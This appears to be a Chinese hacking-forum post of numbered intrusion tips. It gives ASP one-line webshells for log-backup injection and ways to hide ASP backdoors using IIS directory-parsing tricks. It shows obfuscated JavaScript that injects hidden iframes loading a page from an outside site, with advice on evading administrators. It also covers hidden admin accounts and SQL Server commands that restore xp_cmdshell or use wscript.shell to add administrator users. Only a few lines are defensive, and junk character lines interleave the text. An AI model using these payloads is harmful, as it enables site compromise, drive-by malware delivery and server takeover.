, {/ M7 I6 I% l) q+ @; U
# S, Q! i( _; \8 o. s( x; ^
51、log备份时的一句话木马:
+ A1 P- a& p. ?6 }+ W4 r
a).<%%25Execute(request("go"))%%25>
5 G( {7 e7 T. I6 L) ^9 s
b).<%Execute(request("go"))%>
3 n3 Z5 s5 \& X" h
c).%><%execute request("go")%><%
+ P, J; Z* }; @
d).<script language=VBScript runat=server>execute request("sb")</Script>
7 B$ x: b0 @+ y7 u0 u/ @9 H. P
e).<%25Execute(request("l"))%25>
3 J* W6 G) P/ K0 Y, ?
f).<%if request("cmd")<>"" then execute request("pass")%>
. p9 }) q2 U, R% M* G
$ C* g. I( p6 o! h$ Z
52、at "12:17" /interactive cmd
2 z3 A! d6 j3 @6 m3 ^$ V
执行后可以用AT命令查看新加的任务
" S: n. a: I" {, y+ s
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
, C4 W; m+ W1 S/ `' r
7 w: u+ f& B( }" W
53、隐藏ASP后门的两种方法
2 w" m9 M; i/ N; {2 X! u8 ?& y, k/ V8 {
1、建立非标准目录:mkdir images..\
0 _. b6 q) P' H; S
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
6 \6 y* A5 D3 ]6 T6 o" ~+ a) l
通过web访问ASP木马:http://ip/images../news.asp?action=login
" O4 d: l1 ?+ ?- B X5 t* K
如何删除非标准目录:rmdir images..\ /s
3 a( B4 |- x. g! c
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
5 W- c A& w) z9 W$ T) p
mkdir programme.asp
, k: [' P$ Z. Q& G# ^
新建1.txt文件内容:<!--#include file=”12.jpg”-->
; s" E9 V3 O1 x8 e2 K: l: C
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
2 x% f1 d8 k- x
attrib +H +S programme.asp
* y" p1 O" [, G+ U- E2 L
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
' c$ s1 Z& z; t7 s
; B! \6 M0 u8 ?4 X" A- u
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
4 U5 o8 }# e7 s: I- b# r( i
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
- W; v `+ A3 z- y+ o
0 U3 O h) F) Z5 _* B9 J* W
55、JS隐蔽挂马
7 a9 N' [ ?2 T1 B9 H7 V$ s5 V/ f- j- N
1.
3 U- J5 t$ y/ [0 r
var tr4c3="<iframe src=ht";
) u+ d8 N5 I, X0 j0 e
tr4c3 = tr4c3+"tp:/";
% d( ^0 ?, T2 q3 r0 K7 x4 B2 A
tr4c3 = tr4c3+"/ww";
. ?! R8 |' r4 c' T
tr4c3 = tr4c3+"w.tr4";
/ o6 D. b) c. [6 V7 Y0 A, E
tr4c3 = tr4c3+"c3.com/inc/m";
; ]& O# V! ]$ d
tr4c3 = tr4c3+"m.htm style="display:none"></i";
# K9 ]& Z6 u z. @
tr4c3 =tr4c3+"frame>'";
7 ]+ D1 q/ C6 s) a! Q
document.write(tr4c3);
" I( m7 V% b4 p9 ?2 e3 P9 [/ N
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
' C+ l5 I% {& _7 u1 F
& S; Y; S; o! M5 E# t: ]& s
2.
: W* V4 \7 N% I) W) f
转换进制,然后用EVAL执行。如
& o+ E& H) e2 n% o' Q5 E8 X8 c
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
/ e6 ]; j+ z3 [# e0 u7 L# K! B9 C
不过这个有点显眼。
5 ~" r) Z1 T) F4 ^2 G+ L3 a1 i
3.
2 Y& j) ]" C% C8 p( h$ K
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
e* H# ~& v; q* N$ e" Y
最后一点,别忘了把文件的时间也修改下。
* T( z- p5 s! l
+ g' [' A% z2 l# i$ N8 [9 ~2 F7 _2 s
56.3389终端入侵常用DOS命令
. p' {6 t+ z( o. ]: f( a+ [ F
taskkill taskkill /PID 1248 /t
- X% l/ P2 Z' [, \1 V" @
r+ b% b2 o" m3 k
tasklist 查进程
! X4 L: P+ v5 G! o6 D3 a
: A. x( L0 G2 K7 B. u# K0 M
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
: {9 u: M/ e) X( c2 ^1 [6 {
iisreset /reboot
6 K4 F \/ Z. r8 J$ z- W" R$ `
tsshutdn /reboot /delay:1 重起服务器
7 U* ^. W, q$ {3 F1 c8 z
2 n" D2 |( E o) Z. r3 m. J1 p# v/ _% s
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 Z- D7 ~1 F s% {3 I+ b# f
& O2 V+ n0 X8 c2 w) w' a- g
query user 查看当前终端用户在线情况
- v6 v+ ~6 y/ H
. R `9 E9 p4 a! ^7 l; m
要显示有关所有会话使用的进程的信息,请键入:query process *
s# \! L# Q G+ [$ ?6 B3 w
: C. l9 ?1 s% P% l( O( R
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
* L6 U9 A8 d$ Y- t) m% N2 `+ h I8 a
9 S' Y- v3 Q2 i$ R
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
9 x# T; B! ^" W; J9 K# m
! v; r5 C! C# J: T8 ?% {
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
% x7 Q [* H0 L0 c3 K6 `
7 ]1 J) b( d7 y; s8 ~8 V6 g
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
4 s- K4 Y+ J1 ?2 N( g. |
F4 b5 V7 i9 }6 A* w
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
9 \: n4 W( R6 W9 H
- l! d7 D7 V7 R: W
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
; T h* d( f9 X& U5 O3 d- L) Q" p
8 ^# p! K5 l! V" i9 {) h Y4 F
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
$ a$ J6 A$ z6 n5 O, U" `
* L _/ _% k0 m
56、在地址栏或按Ctrl+O,输入:
8 X/ y& M& i/ {8 C0 F7 N
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
$ s' P2 q4 X9 Z* p: |5 k, {
0 i8 |+ j( k/ B9 ?
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
* ~ c& L: Z- }
- M* b) l8 F# F* ]( u1 N2 @
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
' L U$ A. H+ u/ ^, D
用net localgroup administrators是可以看到管理组下,加了$的用户的。
: s$ N) v. N& x4 [# g
8 H4 a' b6 e7 m% @, I7 q
58、 sa弱口令相关命令
+ L- o4 c( J7 C
' _, [5 I; ] p
一.更改sa口令方法:
4 g d% S2 W. f9 d7 k6 k
用sql综合利用工具连接后,执行命令:
1 T/ G( f; h" G; r7 a7 r
exec sp_password NULL,'20001001','sa'
9 _$ Z z& U" L! |/ e4 K
(提示:慎用!)
) F4 c) c1 t( ^) L0 l
U5 }( o( u3 V) K
二.简单修补sa弱口令.
* B+ Z! L& q" B1 D
5 X ~: ^# y$ v- M4 N
方法1:查询分离器连接后执行:
5 R0 Y' Z0 w* t) C. m9 t
if exists (select * from
4 u0 K( s N1 D4 s
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
2 |( u4 i e$ }6 t/ f/ z2 `
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
# }* `* q7 h- F0 _- Q
- L0 G. ~, H1 g
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
" n8 c! C" [( H2 l* K5 F- y6 v' R
6 ^9 b+ R$ f3 X) J+ c% P. z$ M
GO
: ?( ?1 j2 P( V }" W5 p1 q
2 ?3 P" k3 a: h4 y3 {2 a$ g5 ?2 d
然后按F5键命令执行完毕
$ a% x( Q% ]. I* }
2 u$ r1 B# h: C) L! Q- X
方法2:查询分离器连接后
" n1 X, \% P6 X! ]$ G
第一步执行:use master
- t; w, u }; F" \/ Y' S# y0 A; i
第二步执行:sp_dropextendedproc 'xp_cmdshell'
3 L( y$ L r7 O" B
然后按F5键命令执行完毕
( K; v1 I* f: Z. P
0 o) ]( W0 T% ^5 T! y* k
% Y" ^0 H* u- C7 N
三.常见情况恢复执行xp_cmdshell.
6 Q) h8 |6 V8 V4 r7 ]$ S
/ V+ i2 b( A M2 D; r6 j; T6 Z9 A
, A+ l N3 M, e; z- G# A
1 未能找到存储过程'master..xpcmdshell'.
5 w, e8 u% y6 @4 c+ m
恢复方法:查询分离器连接后,
8 _1 ?: R" D' C+ `: P6 ?
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
; ^' m7 N* b0 R/ } a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 ?: R# g5 K2 j+ I- L2 M
然后按F5键命令执行完毕
: X) ?: C8 i1 \
/ ?+ i2 Q4 N" h% l
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
& Y, G. B n3 o% w$ O
恢复方法:查询分离器连接后,
; N1 c3 h+ {0 [7 q8 r" \! {
第一步执行:sp_dropextendedproc "xp_cmdshell"
; K- P4 u6 y$ O' a" E4 ?
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
! S7 x+ s6 n1 @. x
然后按F5键命令执行完毕
3 o! W) x i( O9 n
# b8 Z% J8 R: Q6 `6 g' x5 S6 O
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
6 R! q ^1 \, _6 P& X5 }
恢复方法:查询分离器连接后,
. h+ k3 a+ M1 {
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
% s: b7 ^4 e( n5 c# s; C( [
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
, L6 G! A% @) w4 ]7 h
然后按F5键命令执行完毕
p" a0 l; R& c6 Y( U. M. J
0 l2 M3 L/ a6 G, m- S+ N% Q$ |) \
四.终极方法.
" D8 {3 C+ Z* B: h
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
- I/ r+ }6 K) K( n" {' l+ I
查询分离器连接后,
% T1 i/ N3 R8 H! q
2000servser系统:
0 H. H v, U4 P, U Y {# \# d
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
0 Y4 m. \5 J/ l+ z0 r7 M
$ n' ^& e* a3 f7 {8 E& Y$ t$ z% T7 ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 }! @( v2 c7 f/ T( W! D
3 c7 U7 E; B" j
xp或2003server系统:
+ V: {* v4 S7 R3 L" q) j2 H! K
1 c% }: d3 e/ C, p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
9 W% ?/ d% _; f7 w; m1 c. v) ~
: N: j) ^+ _' _1 [; z, ^
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
2 V, Y" O; k- d
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2